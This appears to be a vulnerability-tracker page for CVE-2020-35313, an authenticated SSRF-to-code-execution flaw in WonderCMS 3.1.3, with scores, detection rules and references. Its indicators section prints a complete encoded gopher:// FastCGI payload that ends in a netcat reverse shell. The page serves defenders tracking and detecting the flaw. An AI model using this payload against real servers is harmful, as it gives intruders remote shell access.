CVE-2020-35313
published 2021-04-20CVE-2020-35313: A server-side request forgery (SSRF) vulnerability in the addCustomThemePluginRepository function in index.php in WonderCMS 3.1.3 allows remote attackers to…
PriorityP270critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
45.22%
98.6th percentile
A server-side request forgery (SSRF) vulnerability in the addCustomThemePluginRepository function in index.php in WonderCMS 3.1.3 allows remote attackers to execute arbitrary code via a crafted URL to the theme/plugin installer.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wondercms | wondercms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandgopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500↗
- →Monitor HTTP GET requests to index.php containing the query parameter 'installThemePlugin' with a gopher:// scheme URI, which is the attack delivery vector for this SSRF-to-RCE chain. ↗
- →Detect outbound or loopback gopher:// scheme requests targeting 127.0.0.1:9000, indicative of SSRF abuse against a local FastCGI (PHP-FPM) listener. ↗
- →Alert on the presence of the string 'Made-by-SpyD3r' in HTTP request bodies or URL-encoded payloads, which is a unique marker embedded in the FastCGI exploit payload. ↗
- →Detect FastCGI PHP_VALUE injection attempts setting 'allow_url_include = On' and 'auto_prepend_file = php://input', which enables arbitrary PHP code execution via the gopher SSRF payload. ↗
- →The exploit requires an authenticated session; monitor for POST login attempts to WonderCMS followed immediately by GET requests with 'installThemePlugin' parameter as a behavioral chain indicator. ↗
- →The vulnerable function is addCustomThemePluginRepository in index.php; audit WAF/application logs for unsanitized URL values passed to the theme/plugin installer endpoint. ↗
- ·The gopher-based FastCGI payload hardcodes SCRIPT_FILENAME as /usr/share/php/PEAR.php; this path must exist on the target system for the RCE stage to succeed. Targets without PEAR installed at this path will not be exploitable via this specific payload. ↗
- ·Exploitation requires FastCGI (PHP-FPM) to be listening on localhost port 9000. Environments using a Unix socket or a non-default port will not be vulnerable to this specific exploit chain. ↗
- ·The exploit requires valid CMS credentials; unauthenticated attackers cannot trigger the SSRF directly. Credential compromise is a prerequisite. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
https://github.com/robiso/wondercmshttps://packetstormsecurity.com/files/160310/WonderCMS-3.1.3-Code-Execution-Server-Side-Request-Forgery.htmlhttps://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/https://github.com/robiso/wondercmshttps://packetstormsecurity.com/files/160310/WonderCMS-3.1.3-Code-Execution-Server-Side-Request-Forgery.htmlhttps://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/
2021-04-20
Published